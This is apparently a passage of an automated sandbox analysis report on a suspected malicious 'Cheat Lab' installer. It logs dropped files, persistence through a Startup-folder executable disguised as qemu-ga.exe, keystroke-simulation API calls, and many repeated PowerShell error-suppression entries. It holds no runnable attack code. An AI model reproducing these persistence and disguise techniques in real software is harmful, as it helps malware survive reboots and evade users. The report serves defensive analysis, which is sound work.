                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF38B.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF3AB.tmpJump to dropped file
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI713.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI841.tmpJump to dropped file
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzQx.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7E2.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI743.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4E34.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI773.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI695.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F2F.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI713.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI841.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DnsJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the startup folder
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009823FC IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,29_2_009823FC
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0090F64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,29_2_0090F64C
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
